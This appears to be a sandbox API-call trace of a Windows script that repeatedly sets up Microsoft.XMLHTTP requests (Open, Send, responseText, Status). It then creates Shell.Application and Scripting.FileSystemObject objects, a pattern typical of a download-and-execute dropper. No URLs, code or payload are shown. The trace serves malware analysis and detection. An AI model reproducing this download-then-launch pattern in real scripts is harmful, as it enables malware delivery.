	[0327.438] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0327.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0327.438] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0327.438] SysStringLen (param_1=0x0) returned 0x0
	[0327.438] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0327.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0327.438] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0327.438] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0327.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0327.438] ??2@YAPEAX_K@Z () returned 0x62f330
	[0327.438] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0327.438] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0327.438] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0327.438] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0327.439] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0327.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0327.439] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0327.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0327.439] longjmp () 
	[0327.439] longjmp () 
	[0327.439] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0327.439] SysStringLen (param_1=0x0) returned 0x0
	[0327.439] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0327.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0327.439] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0327.439] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0327.439] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0327.439] ??2@YAPEAX_K@Z () returned 0x62f310
	[0327.439] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0327.439] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0327.440] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0327.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0327.440] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0327.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0327.440] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0327.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0327.440] longjmp () 
	[0327.440] longjmp () 
	[0327.440] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0327.440] SysStringLen (param_1=0x0) returned 0x0
	[0327.440] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0327.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0327.440] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0327.440] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0327.440] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0327.441] ??2@YAPEAX_K@Z () returned 0x62f330
	[0327.441] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0327.441] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0327.441] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0327.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0327.441] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0327.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0327.441] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0327.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0327.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0327.441] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0327.441] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0329.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0329.008] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0329.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0329.008] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0329.008] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0329.009] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0329.009] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0329.009] SysStringLen (param_1=0x0) returned 0x0
	[0329.009] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0329.009] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0329.009] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0329.009] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0329.009] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0329.009] ??2@YAPEAX_K@Z () returned 0x62f350
	[0329.009] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0329.009] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0329.009] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0329.009] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0329.009] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0329.010] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0329.010] SysStringLen (param_1=0x0) returned 0x0
	[0329.010] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0329.013] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0329.013] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0329.013] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0329.013] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0329.013] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0329.013] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0329.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0329.615] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0329.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0329.616] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0329.616] SysStringLen (param_1=0x0) returned 0x0
	[0329.616] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0329.616] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0329.617] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0329.617] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0329.617] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0329.617] ??2@YAPEAX_K@Z () returned 0x62f330
	[0329.617] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0329.617] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0329.617] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0329.617] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0329.617] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0329.617] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
